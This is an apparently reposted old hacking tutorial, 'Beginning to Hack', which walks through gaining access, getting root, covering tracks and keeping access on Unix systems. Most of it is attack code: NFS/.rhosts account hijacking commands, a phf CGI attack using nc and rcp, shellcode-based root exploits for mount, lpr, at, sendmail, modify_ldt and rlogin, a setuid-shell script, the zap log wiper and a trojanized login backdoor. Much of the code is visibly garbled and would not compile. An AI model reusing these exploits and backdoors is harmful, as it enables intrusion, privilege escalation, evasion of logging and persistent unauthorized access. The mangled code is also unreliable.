Beginning to Hack

xiaoxiao2021-03-06 87

User's Guide

__________________________

Well, Howdi Folks ... I Guess you are all wondering who's this guy (me)

That's trying to show you a bit of everything ...??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

Well, I ain't telling you anything of this ...

Intro: Hacking Step by step.

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

Well, this a all't exactely for begginers, but it it'll have to do.

What All Hackers Has To Know Is That There Area 4 Steps in Hacking ...

Step 1: Getting Access to Site.

Step 2: Hacking r00t.

Step 3: Covering Your Traces.

STEP 4: Keeping That Account.

OK. In the next page.................

Step 1: Getting Access.

_______

Well Folks, There Are Several Methods To Get Access To A Site.

I'll try to explain the MOST USED ONES.

The First Thing I do Is See If The System Has An Export List:

Mysite: ~> / usr / sbin / showmount -e victim.site.com

RPC: program not registered.

IT Gives a Message Like this One, The It's Time Time To Search Another Way

IN.

What I WAS Trying to do Was to Exploit An Old Security Problem by Most

Sun Os's That Could ALOW AN Remote Attacker To Add a.rhosts to a Users

Home Directory ... (That Was Possible if The site had mounted their home

Directory.

Let's see what happens ...

Mysite: ~> / usr / sbin / showmount -e victim1.site.com

/ usr victim2.site.com

/ Home (Everyone)

/ cdrom (everyone)

Mysite: ~> MKDIR / TMP / MOUNT

Mysite: ~> / bin / mount -nt nfs victim1.site.com :/Home / TMP / MOUNT /

Mysite: ~> ls -sal / tmp / mount

Total 9

1 drwxrwxr-x 8 root root 1024 JUL 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 AT1 User $ 1024 JUN 22 19:18 AT1 /

1 DR-XR-XR-X 8 FTP WHEEL 1024 JUL 12 14:20 FTP / 1 DRWXRX-R-X 3 John 100 1024 JUL 6 13:42 John /

1 DrwxRX-R-X 3 139 100 1024 Sep 15 12:24 Paul /

1 -RW ------- 1 root root 242 Mar 9 1997 Sudoers

1 drwx ------ 3 Test 100 1024 OCT 8 21:05 TEST /

1 drwx ------ 15 102 100 1024 OCT 20 18:57 Rapper /

Well, We Wanna Hack Into Rapper's Home.

Mysite: ~> ID

UID = 0 EUID = 0

Mysite: ~> WhoAmi

root

Mysite: ~> echo "rapper :: 102: 2 :: / tmp / mount: / bin / csh" >> / etc / passwd

We use / bin / csh 'Cuz Bash Leaves A (DAMN!) .Bash_history and you might

Forget it on the remote server ...

Mysite: ~> su - rapper

Welcome to rapper's user.

Mysite: ~> ls -lsa / tmp / mount /

Total 9

1 drwxrwxr-x 8 root root 1024 JUL 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 AT1 User $ 1024 JUN 22 19:18 AT1 /

1 DR-XR-XR-X 8 FTP WHEEL 1024 JUL 12 14:20 FTP /

1 drwxRX-R-x 3 John 100 1024 JUL 6 13:42 John /

1 DrwxRX-R-X 3 139 100 1024 Sep 15 12:24 Paul /

1 -RW ------- 1 root root 242 Mar 9 1997 Sudoers

1 drwx ------ 3 Test 100 1024 OCT 8 21:05 TEST /

1 drwx ------ 15 Rapper daemon 1024 Oct 20 18:57 Rapper /

So We own this guy's home directory ...

Mysite: ~> echo " "> rapper / .rhosts

Mysite: ~> CD /

Mysite: ~> rlogin victim1.site.com

Welcome to Victim.site.com.

Sunos Ver .... (CRAP).

Victim1: ~ $

This is the first method ...

Another Method Could Be to See ethers Port. That 10

Mean That The Site Has A Web Page.

(AND That's Very Bad, 'Cuz IT Usually It's Vulnerable).

Below I include The source of a scanner what helped me. Nmap..

(Go Get It at http://www.dhp.com/~fyodor. Good job, fyodor).

Nmap is a scanner this does Even Stealth Scanning, So Lots of Systems Wo n'tRecord IT.

/ * - * - C - * - TCPPROBE.C * /

/ * TCPPROBE - Report On Which TCP Ports Accept Connections * /

/ * IO error, error@axs.net, SEP 15, 1995 * /

#include

INT main (int Argc, char ** argv)

{

INT ProbEport = 0;

Struct Hostent * Host;

Int Err, I, Net;

Struct sockaddr_in sa;

IF (argc! = 2) {

Printf ("USAGE:% s hostname / n", argv [0]);

Exit (1);

}

For (i = 1; i <1024; i ) {

Strncpy ((char *) & sa, "", sizeof sa);

sa.sin_family = af_inet;

IF (Isdigit (* Argv [1])))

Sa.sin_addr.s_addr = inet_addr (argv [1]);

Else IF ((Host = gethostByname)! = 0)

STRNCPY ((char *) & sa.sin_addr, (char *) Host-> h_addr, sizeof sa.sin_addr);

Else {

Herror (Argv [1]);

EXIT (2);

}

sa.sin_port = htons (i);

Net = Socket (AF_INET, SOCK_STREAM, 0);

IF (Net <0) {

PERROR ("/ nsocket");

EXIT (2);

}

Err = Connect (Net, (Struct SockAddr *) & Sa, Sizeof SA);

IF (Err <0) {

Printf ("% S %-5d% S / R", Argv [1], I, STRERROR (Errno));

Fflush (stdout);

} else {

Printf ("% s% -5d accountted. / n", argv [1], i);

IF (Shutdown (Net, 2) <0) {

PERROR ("/ nshutdown");

EXIT (2);

}

Close (NET);

}

Printf ("/ r");

Fflush (stdout);

Return (0);

}

Well, Now Be Very Carefull with the below exploits, Because The Usually Get

Logged.

Besides, if you real wanna get a Source File from / cgi-bin / use tris

Sintax: lynx http://www.victim1.com//cgi-bin/finger

IF you don't wanna do what, the DO A:

Mysite: ~> Echo " "> / TMP / RHOSTSMYSITE: ~> Echo "Get /cgi-bin/phf?qalias=x RCP PHANTOM@mysite.com: quitmp/rhosts

/Root/.rhosts | NC -V - 20 Victim1.site.com 80

THEN

Mysite: ~> rlogin -l root victim1.site.com

Welcome to Victim1.site.com.

Victim1: ~ #

OR, Maybe, Just Try to Find Out Usernames and Passwords ...

The Usual Users Are "Test", "Guest", And Maybe the Owner of the Site ...

I usually don't do soizz, but you can ...

OR iF the site is really old, use what (quote site exec) Old bug for

Wu.ftpd.

There Are A Lot of Other Exploits, Like The Remote Exploits (Innd, IMAP2,

POP3, ETC ...) That You can Find At Rootshell.connectNet.com OR AT

DHP.com/~ feYodor.

Enough About this Topic. (BESIDES, IF you can finger the site, you can

Figgure out usernames and maybe by guessing passwords (sigh!) You Could Get

Access to the site.

Step 2: Hacking r00t.

______

First You Have to Find The System It's Running ...

a). Linux

All Versions:

A BIG BUG for All Linux Versions Is Mount / Umount And (Maybe) LPR.

/ * Mount Exploit for Linux, Jul 30 1996

::::: :::::::::::::::::::::: ::::::::::::::

::::::: "` `` `` "" :::::::: "` `` "" :: "` `` ".g $$ s $ '`` `` `` `` "" :::::::::::

::::: '. G # s $$ "$$ S # n................................... $$$$$$ "$$ s # n.` ::::::::

:::::: $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$ ::::::

:::::: $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ ::::::

::::::$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$ ::::::

::::::$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$ ::::::

::::::`: $$$$ S $$$$ S $$$$`s $$$$ S $$$ $$$$$ $$$$$$$$$$$$$ ::::::

::::: ......... ::: ......... :: .. .....: .........................................

::::::::::::::::::::::::: ::::::::::::::

Discovered and code by Bloodmask & Vio

Covin Security 1996

* /

#include

#define path_mount "/ bin / mount"

#define buffer_size 1024

#define default_offset 50

u_long get_esp ()

{

__ASM __ ("MOVL% ESP,% EAX");

}

Main (int Argc, char ** argv)

{

u_char execShell [] =

"/ XEB / X24 / X5E / X8D / X1E / X89 / X5E / X0B / X33 / XD2 / X89 / X56 / X07 / X89 / X56 / X0F"

"/ xb8 / x1b / x56 / x34 / x12 / x35 / x10 / x56 / x34 / x12 / x8d / x4e / x0b / x8b / xd1 / xcd"

"/ x80 / x33 / xc0 / x40 / xcd / x80 / xe8 / xd7 / XFF / XFF / XFF / BIN / SH"

Char * buff = NULL;

Unsigned long * addr_ptr = null;

Char * ptr = NULL;

INT I;

INT OFS = Default_offset;

BUFF = Malloc (4096);

IF (! buff)

{

Printf ("Can't Allocate Memory / N);

exit (0);

}

PTR = BUFF;

/ * Fill Start of buffer with nops * /

MEMSET (PTR, 0x90, Buffer_Size-strlen (Execshell);

PTR = buffer_size-strlen (Execshell);

/ * Stick asm code INTO the buffer * /

For (i = 0; I

* (PTR ) = execShell [i];

Addr_ptr = (long *) PTR;

FOR (i = 0; i <(8/4); i )

* (AddR_ptr ) = get_esp () OFS;

PTR = (char *) addr_ptr; * PTR = 0;

(void) ALARM ((U_INT) 0);

Printf ("Discovered and Coded by Bloodmask and Vio, Covin 1996 / N");

EXECL (Path_Mount, "Mount", Buff, NULL)

}

/ * LPR EXPLOIT: I don't know the author ... * /

#include

#define default_offset 50

#define buffer_size 1023

Long get_esp (void)

{

__ASM __ ("MOVL% ESP,% EAX / N");

}

void main ()

{

Char * buff = NULL;

Unsigned long * addr_ptr = null;

Char * ptr = NULL;

U_CHAR EXECSHELL [] = "/ XEB / X24 / X5E / X8D / X1E / X89 / X5E / X0B / X33 / XD2 / X89 / X56 / X07"

"/ x89 / x56 / x56 / x34 / x12 / x35 / x10 / x56 / x34 / x12"

"/ x8d / x4e / x0b / x8b / xd1 / xcd / x80 / x33 / xc0 / x40 / xcd / x80 / xe8"

"/ xd7 / XFF / XFF / XFF / BIN / SH";

INT I;

BUFF = Malloc (4096);

IF (! buff)

{

Printf ("Can't Allocate Memory / N);

exit (0);

}

PTR = BUFF;

MEMSET (PTR, 0x90, Buffer_Size-strlen (Execshell);

PTR = buffer_size-strlen (Execshell);

For (i = 0; I

* (PTR ) = execShell [i];

Addr_ptr = (long *) PTR;

For (i = 0; i <2; i )

* (addr_ptr ) = get_esp () default_offset;

PTR = (char *) addr_ptr;

* PTR = 0;

Execl ("/ USR / BIN / LPR", "LPR", "-c", buff, null;

}

b.) Version's 1.2. * To 1.3.2

NLspath ENV. Variable Exploit:

/ * It's real ying for users and good for me ...

AT Exploit Gives Only Uid = 0 and EUID = Your_usual_EUID.

* /

#include

#define path "/ usr / bin / at"

#define buffer_size 1024

#define default_offset 50u_long get_esp ()

{

__ASM __ ("MOVL% ESP,% EAX");

}

Main (int Argc, char ** argv)

{

u_char execShell [] =

"/ XEB / X24 / X5E / X8D / X1E / X89 / X5E / X0B / X33 / XD2 / X89 / X56 / X07 / X89 / X56 / X0F"

"/ xb8 / x1b / x56 / x34 / x12 / x35 / x10 / x56 / x34 / x12 / x8d / x4e / x0b / x8b / xd1 / xcd"

"/ x80 / x33 / xc0 / x40 / xcd / x80 / xe8 / xd7 / XFF / XFF / XFF / BIN / SH"

Char * buff = NULL;

Unsigned long * addr_ptr = null;

Char * ptr = NULL;

INT I;

INT OFS = Default_offset;

BUFF = Malloc (4096);

IF (! buff)

{

Printf ("Can't Allocate Memory / N);

exit (0);

}

PTR = BUFF;

MEMSET (PTR, 0x90, Buffer_Size-strlen (Execshell);

PTR = buffer_size-strlen (Execshell);

For (i = 0; I

* (PTR ) = execShell [i];

Addr_ptr = (long *) PTR;

FOR (i = 0; i <(8/4); i )

* (AddR_ptr ) = get_esp () OFS;

PTR = (char *) addr_ptr;

* PTR = 0;

(void) ALARM ((U_INT) 0);

Printf ("AT EXPLOIT Discovered By Me, _PHANTOM_ IN 1997./N");

SetENV ("NLSPATH", BUFF, 1);

EXECL (Path, "AT", NULL);

}

Sendmail Exploit: (Don't try to chmod a-s this one ... :)))

/ * Sendmail Exploit for Linux

* /

#include

#define path "/ usr / bin / sendmail"

#define buffer_size 1024

#define default_offset 50

u_long get_esp ()

{

__ASM __ ("MOVL% ESP,% EAX");

}

Main (int Argc, char ** argv)

{

u_char execShell [] =

"/ XEB / X24 / X5E / X8D / X1E / X89 / X5E / X0B / X33 / XD2 / X89 / X56 / X07 / X89 / X56 / X0F"

"/ xb8 / x1b / x56 / x34 / x12 / x35 / x10 / x56 / x34 / x12 / x8d / x4e / x0b / x8b / xd1 / xcd"

"/X80/X33/xc0/x40/xcd/x80/xe8/xd7/xff/xff/xff./sh";char * buff = null;

Unsigned long * addr_ptr = null;

Char * ptr = NULL;

INT I;

INT OFS = Default_offset;

BUFF = Malloc (4096);

IF (! buff)

{

Printf ("Can't Allocate Memory / N);

exit (0);

}

PTR = BUFF;

MEMSET (PTR, 0x90, Buffer_Size-strlen (Execshell);

PTR = buffer_size-strlen (Execshell);

For (i = 0; I

* (PTR ) = execShell [i];

Addr_ptr = (long *) PTR;

FOR (i = 0; i <(8/4); i )

* (AddR_ptr ) = get_esp () OFS;

PTR = (char *) addr_ptr;

* PTR = 0;

(void) ALARM ((U_INT) 0);

Printf ("Sendmail Exploit Discovered By Me, _PHANTOM_ IN 1997 / N");

SetENV ("NLSPATH", BUFF, 1);

EXECL (Path, "Sendmail", NULL;

}

MOD_LDT EXPLOIT (GOD, THIS One Gave Such a Headache to My Sysadmin (root)

!!!)

/ * this is a hack of a hack. a Valid System.map Was Needed to Get this

Sploit to Werk .. But not any longer .. this sploit will girl you root

IF the modify_ldt bug Werks .. Which I beleive it does in Any Kernel

Before 1.3.20..

QUANTUMG

* /

/ * Original Code Written by Morten Welinder.

* This Required 2 Hacks to work on the 1.2.13 kernel That I'VE TESTED ON:

* 1. ASM / Sigcontext.h does not exist on 1.2.13 and so it is removed.

* 2. The _task in The System.map File Has No Leading Underscore.

* I am Not Sure At What Point Ssene Changed, IF you are

* USING THIS ON A NEWER KERNEL Compile with newerkernel defined.

* -Red

* /

#include

#ifdef newerkernel

#include

#ENDIF

#define __kernel__

#include

Static Inline_syscall1 (int, get_kernel_syms, struct kernel_sym *, table);

Static inline _syscall3 (int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)

#define kernel_base 0xc0000000

/ * ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------ * /

STATIC __INLINE__ UNSIGNED Char

__farpeek (int SEG, Unsigned OFS)

{

UNSIGNED Char res;

ASM ("MOV% W1, %% GS; GS; MOVB (% 2), %% Al"

: "= a" (RES)

: "R" (SEG), "R" (OFS));

Return res;

}

Static __inline__void

__farpoke (int SEG, Unsigned OFS, UNSIGNED Char B)

{

ASM ("MOV% W0, %% GS; GS; MOVB% B2, (% 1)"

: / * No results. * /

: "R" (SEG), "R" (OFS), "R" (b));

}

Void

MemgetSeg (Void * DST, INT SEG, Const Void * SRC, INT Size)

{

While (size -> 0)

* (char *) DST = __farpeek (seg, (unsigned) (SRC ));

}

Void

Memputseg (int SG, Void * DST, Const Void * SRC, INT Size)

{

While (size -> 0)

__farpoke (seg, (unsigned) (DST ), * (char *) SRC );

}

int

Main ()

{

Int Stat, I, J, K;

STRUCT MODIFY_LDT_LDT_S LDT_ENTRY;

File * SYMS;

Char line [100];

Struct Task_struct ** Task, * Taskptr, Thistask

Struct kernel_sym blah [4096];

Printf ("Bogusity Checker for Modify_LDT System Call./N");

Printf ("Testing for Page-Size Limit Bug ... / N");

LDT_ENTRY.ENTRY_NUMBER = 0; LDT_ENTRY.BASE_ADDR = 0xBffFFFFFF;

LDT_ENTRY.LIMIT = 0;

LDT_ENTRY.SEG_32Bit = 1;

LDT_ENTRY.CONTENTS = Modify_LDT_Contents_Data;

LDT_ENTRY.READ_EXEC_ONLY = 0;

LDT_ENTRY.LIMIT_IN_PAGES = 1;

LDT_ENTRY.SEG_NOT_PRESENT = 0;

Stat = modify_ldt (1, & ldt_entry, sizeof (ldt_entry));

IF (stat)

/ * ContinueAfter Reporting Error. * /

Printf ("This Bug Has Been Fixed In Your Keernel./N");

Else

{

Printf ("Shit Happens:");

Printf ("0xC0000000 - 0xC0000FFE IS Accessible./N");

}

Printf ("Testing for Expand-Down Limit Bug ... / N");

LDT_ENTRY.BASE_ADDR = 0x00000000;

LDT_ENTRY.LIMIT = 1;

LDT_ENTRY.CONTENTS = Modify_LDT_Contents_stack;

LDT_ENTRY.LIMIT_IN_PAGES = 0;

Stat = modify_ldt (1, & ldt_entry, sizeof (ldt_entry));

IF (stat)

{

Printf ("This Bug Has Been Fixed In Your Keernel./N");

Return 1;

}

Else

{

Printf ("Shit Happens:");

Printf ("0x00000000 - 0xffffffd is accessible./N");

}

i = get_kernel_syms (blah);

K = i 10;

For (j = 0; j

IF (! strcmp (blah [j] .name, "current") ||! strcmp (blah [j] .name, "_ current")) k = j;

IF (k == i 10) {Printf ("Current Not Found !!! / N); Return (1);}

J = K;

Taskptr = (struct task_struct *) (kernel_base blah [j] .value);

MemgetSeg (& Taskptr, 7, Taskptr, SIZEOF (Taskptr);

Taskptr = (struct task_struct *) (kernel_base (unsigned long) Taskptr

MemgetSeg (& Thistask, 7, Taskptr, SizeOf (THISTASK);

IF (thisTask.pid! = getpid ()) {Printf ("Current Process Not Found / N); Return (1);}

Printf ("Current Process IS% I / N", THISTASK.PID); Taskptr = (Struct Task_struct *) (kernel_base (unsigned long);

MemgetSeg (& Thistask, 7, Taskptr, SizeOf (THISTASK);

IF (thisTask.pid! = getppid ()) {Printf ("current process not found / n"); return (1);}

Printf ("Parent Process I / N", Thistask.PID);

THISTASK.UID = thisTask.EUID = thisTask.suid = thisTask.fsuID = 0;

THISTASK.GID = thisTask.egid = thistask.sgid = thistask.fsgId = 0;

MemputSeg (7, Taskptr, & Thistask, Sizeof (THISTASK));

Printf ("Shit Happens: Parent Process Is Now Root Process./N);

Return 0;

}

c. Other Linux Versions:

Sendmail Exploit:

# / bin / sh

# Hi!

# This is expel for sendmail smtpd bug

# (Ver. 8.7-8.8.2 for FreeBSD, Linux and May BE Other Platforms).

# This shell script does a root shell in / tmp Directory.

# If you have anyproblems with it, drop me a letter.

# Have fun!

# ----------------------

# ---------------------------------------------

# ----------------- Dedicated to my beauty lady ------------------

# ---------------------------------------------

# ----------------------

# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su

Echo 'main () >> Leshka.c

Echo '{' >> Leshka.c

Echo 'EXECL ("/ usr / sbin / sendmail", "/ tmp / smtpd", 0);' >> Leshka.c

Echo '}' >> Leshka.c

Echo 'main () >> SMTPD.C

Echo '{' >> SMTPD.C

Echo 'setuid (0); setgid (0);' >> SMTPD.C

Echo 'System ("CP / BIN / SH / TMP; CHMOD A = RSX / TMP / SH");' >> SMTPD.C

Echo '}' >> SMTPD.C

Cc -o leshka leshka.c; cc -o / tmp / smtpd smtpd.c

./leshka

Rm leshka.c leshka smtpd.c / tmp / smtpd

Echo "Now Type: / TMP / SH"

SUNOS:

Rlogin Exploit:

(arghh!)

#include

#define buf_length 8200

#define extra xtra 100

#define stack_offset 4000

#define sparc_nop 0xA61cc013

u_char sparc_shellcode [] =

"/ x82 / x10 / x20 / xca / xa6 / x1c / xc0 / x13 / x90 / x0c / xc0 / x13 / x92 / x0c / xc0 / x13"

"/ Xa6 / X04 / XE0 / X01 / X91 / XD4 / XFF / XFF / X2D / X0B / XD8 / X9A / XAC / X15 / XA1 / X6E"

"/ X2F / X0B / XDC / XDA / X90 / X0B / X80 / X0E / X92 / X03 / XA0 / X08 / X94 / X1A / X80 / X0A"

"/ X9C / X03 / XA0 / X10 / XEC / X3B / XBF / XF0 / XDC / X23 / XBF / XF8 / XC0 / X23 / XBF / XFC"

"/ x82 / x10 / x20 / x3b / x91 / xd4 / XFF / XFF";

U_long get_sp (void)

{

__ASM __ ("MOV% SP,% I0 / N");

}

Void main (int Argc, char * argv [])

{

Char BUF [BUF_LENGTH EXTRA];

Long Targ_Addr;

u_long * long_p;

U_CHAR * CHAR_P;

INT I, CODE_LENGTH = Strlen (sparc_shellcode);

Long_p = (u_long *) BUF;

FOR (i = 0; i <(buf_length - code_length) / sizeof (u_long); i )

* long_p = SPARC_NOP;

Char_p = (u_char *) long_p;

For (i = 0; i

* CHAR_P = SPARC_SHELLCODE [I];

Long_p = (u_long *) char_p;

TARG_ADDR = GET_SP () - stack_offset;

For (i = 0; i

* long_p = targ_addr;

Printf ("JUMPING To Address 0x% LX / N", TARG_ADDR;

Execl ("/ usr / bin / rlogin", "rlogin", buf, (char *) 0);

Perror ("Execl Failed");

}

Want More Exploits? Get 'em from Other Sites (Like Rootshell, DHP.com / ~ Fyodor, etc ...).

Step 3: Covering Your Tracks:

______

For this you could Use lots of programs like zap, utclean, and lots of ods

Others ...

Watch out, AlwaysAfter You CLOAKED YOURSELF TO SEE IF IT WORKED DO A:

Victim1: ~ $ WHO

... (CRAP) ...

Victim1: ~ $ finger

...; as ;; sda ...

Victim1: ~ $ w

...

IF you are still not cloaked, look for wtmpx, utmpx and other stuff like

That. The only cloaker (That i know) That ERSED Me Even from WTMPX / UTMPX

WAS Utclean. But I don't have it right now, so zap'll Have to do the job.

/ *

Title: Zap.c (c) ROKK Industries

Sequence: 911204.b

Syztems: kompiles on sunos 4.

Note: To mask yourself from lastlog and wtmp you need to be root,

UTMP is Go W on Default Sunos, but is sol --etimes remoded.

Kompile: cc -o zap.c-zap

Run: zap

Desc: Will Fill The WTMP and Utmp Entries Corresponding to the THE

ENTERED Username. It also Zeros Out The Last Login Data for

THE SPECIFIC USER, FINGERING That User Will Show 'NEVER LOGGED

In '

USAGE: if you cant find a usage for this, get a brain.

* /

#include

INT F;

Void Kill_TMP (Name, WHO)

Char * name,

* WHO;

{

Struct utmp utmp_ent;

IF ((f = Open (Name, O_RDWR)> = 0) {

While (READ (F, & UTMP_ENT, SIZEOF (UTMP_ENT))> 0)

IF (! Strncmp (UTMP_ENT.UT_NAME, WHO, STRLEN (WHO))) {

Bzero ((char *) & utmp_ent, sizeof (utmp_ent));

Lseek (f, - (SIZEOF (UTMP_ENT)), seek_cur);

Write (f, & utmp_ent, sizeof (utsp_ent));

}

Close (f);

}

Void Kill_Lastlog (WHO)

Char * who; {{

Struct Passwd * PWD;

Struct LastLog Newll;

IF ((PWD = getPwnam (WHO))! = null) {

IF ((f = open ("/ usr / adm / lastlog", o_rdwr))> = 0) {

Lseek PWD-> PW_UID * SIZEOF (STRUCT LastLog), 0);

Bzero ((char *) & newll, sizeof (new);

Write (f, (char *) & newll, sizeof (new);

Close (f);

}

} Else Printf ("% s:? / n", who);

}

Main (Argc, Argv)

Int argc;

Char * argv [];

{

IF (argc == 2) {

Kill_TMP ("/ etc / utmp", argv [1]);

Kill_TMP ("/ USR / ADM / WTMP", Argv [1]);

Kill_lastlog (Argv [1]);

Printf ("ZAP! / N");

Else

Printf ("Error./N");

}

STEP 4: Keeping That Account.

_______

THIS Usually Means That You'll Have To Install Some Program To Give You

Access Even if the root has killed your account ...

(Daem !!!) => |

Here Is An Example of a Login Daemon from the Demonkit (Good Job,

Fellows ...)

Look out !!! if you decide to put a daemon, Be Careful and Modify It's Date

(Use touch --help to see how!)

/ *

This Is A Simple Trojanized Login Program, this Was Designed for Linux

And Will Not Work without Modification On Linux. It lets you login as

Either a root user, or any ordinary user by use of a 'magic password'.

IT WILL Also Prevent The Login from Being Logged Into UTMP, WTMP, ETC.

You Will Effectively Be Invisible, and not be detected except via 'ps'.

* /

#define Backdoor "Password"

INT KRAD = 0;

/ * This Program Is Derived from 4.3 BSD Software and IS

Subject to the copyright notice below.

The Port to HP-UX HAS Been Motivated by The Incapability

Of 'rlogin' / 'rlogind' AS Per HP-UX 6.5 (and 7.0) To Transfer Window Sizes.

Changes:

- General HP-UX Portation. Use of facilities NOT Availablein HP-UX (E.G. SetPriority) HAS Been Eliminated.

UTMP / WTMP HANDLING HAS BEEN PORTED.

- The Program Uses BSD Command Line Options To BE Used

In Connection with E.G. 'rlogind' i.e. 'new login'.

- HP Features Left Out: Logging of Bad Login Attempts In / etc / btmp,

They area Sent to syslog

Password expiry

'*' as login shell, add it if you need it

- BSD Features Left Out: Quota Checks

Password expiry

Analysis of Terminal Type (Tset Feature)

- BSD Features Thrown in: Security logging to syslogd.

THIS Requires You To Have A (Ported) Syslog

SYSTEM - 7.0 Comes with syslog

'LastLog' Feature.

- a Lot of Nitty Gritty Details Has Been Adjusted in Favour of

HP-UX, E.G. / etc / securetty, default paths and the environment

Variables assigned by 'login'.

- We do * Nothing * To setup / alter Tty State, Under HP-UX this IS

To be done by getty / rlogind / telnetd / some else.

Michael Glad (Glad@daimi.dk)

Computer science department departments

AARHUS University

Denmark

1990-07-04

1991-09-24 Glad@daimi.aau.dk: HP-UX 8.0 Port:

- Now Explicly Sets Non-Blocking Mode on Descriptors

- strcasecmp is now part of HP-UX

1992-02-05 PoE@daimi.aau.dk: ported the stuff to linux 0.12

From 1992 Till Now (1995) This Code for Linux Has Been Maintained AT

ftp.daimi.aau.dk:/pub/linux/poE/

* /

/ *

* Redistribution and use in Source and Binary Forms Are Permitted

* Provided That The Above Copyright Notice and this Paragraph Are

* Duplicated in all claim forms and this any documentation,

* Advertising Materials, And Other Materials Related To Such * Distribution and Use Acknowledge That The Software Was Developed

* by the university of cagifornia, Berkeley. The name of the

* University May Not Be Used to Endorse or Promote Products Derived

* From this Software Without Specific Prior Written Permission.

* This Software Is Provided `` as is '' and with welcome any express or

* Implied Warranties, Including, Without Limitation, The Implied

* Warranties of Merchantibility and FITNESS for a Particular Purpose.

* /

#ifndef lint

CHAR COPYRIGHT [] =

#ENDIF / * NOT LINT * /

#ifndef lint

Static char sccsid [] = "@ (#) login.c 5.40 (Berkeley) 5/9/89"

#ENDIF / * NOT LINT * /

/ *

* login [name]

* login -h hostname (for telnetd, etc.)

* login -f name (for pre-authenticated login: Datakit, XTERM, ETC.)

* /

/ * #define testing * /

#ifdef Testing

#include "param.h"

#ELSE

#include

#ENDIF

#include

#define Index StrChr

#define rindex Strrchr

#include

#ifdef Testing

# include "utsp.h"

#ELSE

# include

#ENDIF

#ifdef shadow_pwd

#include

#ENDIF

#ifndef linux

#include

#ELSE

Struct Lastlog

{long ll_time;

Char ll_line [12];

Char ll_host [16];

}

#ENDIF

#include "pathnames.h"

#define p_ (s) ()

Void OpenTTY P_ ((const char * tty));

Void getloginname p _ ((void));

Void Timedout P_ (Void));

INT Rootterm P_ ((Char * TTYN));

Void Motd P_ (Void));

Void Sigint P_ ((void));

Void Checknologin P_ (Void));

Void DolastLog P _ (INT Quiet);

Void Badlogin P_ (CHAR * NAME));

Char * styleof p _ (char * ttyid));

Void Checktty P_ (Char * User, Char * TTY));

Void getStr P _ ((Char * BUF, INT CNT, Char * Err));

Void Sleepexit P_ (INT EVAL);

#undef p_

#ifdef Kerberos

#include

Char Realm [Realm_sz];

INT Kerror = ksuccess, notickets = 1;

#ENDIF

#ifndef linux

#define TTYGRPNAME "TTY" / * Name of Group to OWN TTYS * /

#ELSE

# define TTYGRPNAME "Other"

# impNDEF MAXPATHLEN

# Define maxpathlen 1024

# Endif

#ENDIF

/ *

* This Bounds The Time Given to login. NOT A Define SO IT CAN

* Be patched on Machines Where It's TOO SMALL.

* /

#ifndef linux

INT TIMEOUT = 300;

#ELSE

INT TIMEOUT = 60;

#ENDIF

Struct Passwd * PWD;

INT Failures;

Char Term [64], * Hostname, * Username, * TTY

Char thishost [100];

#ifndef linux

Struct SGTTYB SGTTTYB;

Struct tchars tc = {

Cintr, Cquit, Cstart, Cstop, CEOT, CBRK

}

Struct LTChars LTC = {

CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT

}

#ENDIF

Char * months [] =

{"Jan", "Feb", "Mar", "APR", "May", "Jun", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC"}

/ * provided by Linus Torvalds 16-Feb-93 * /

Void

OpenTTY (const char * tty)

{

INT I;

INT fd = open (TTY, O_RDWR);

For (i = 0; i

Close (i);

For (i = 0; i <3; i )

DUP2 (FD, I);

IF (fd> = 3)

Close (FD);

}

int

Main (Argc, Argv)

Int argc;

Char ** argv;

{

Extern int errno, Optind;

Extern char * OPTARG, ** ENVIRON

Struct TimeVal TP;

StructTM * TTP;

Struct Group * GR;

INT ASK, FFLAG, HFLAG, PFLAG, CNT;

Int Quietlog, Passwd_req, IOCTLVAL;

Char * Domain, * Salt, * TTYN, * PP;

Char TBUF [MAXPATHLEN 2], TNAME [SIZEOF (_PATH_TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTY 10];

Char * ctime (), * TTYNAME (), * STYPEOF ();

Time_t time ();

Void timedout ();

Char * Termenv;

#ifdef linux

Char TMP [100];

/ * Just As Arbitrary As Mountain Time: * /

/ * (void) STENV ("TZ", "Met-1DST", 0); * /

#ENDIF

(void) Signal (SIGALRM, TIMEDOUT);

(void) ALARM (UNSIGNED INT) TIMEOUT;

(void) Signal (SIGQUIT, SIG_IGN);

(void) Signal (SIGINT, SIG_IGN);

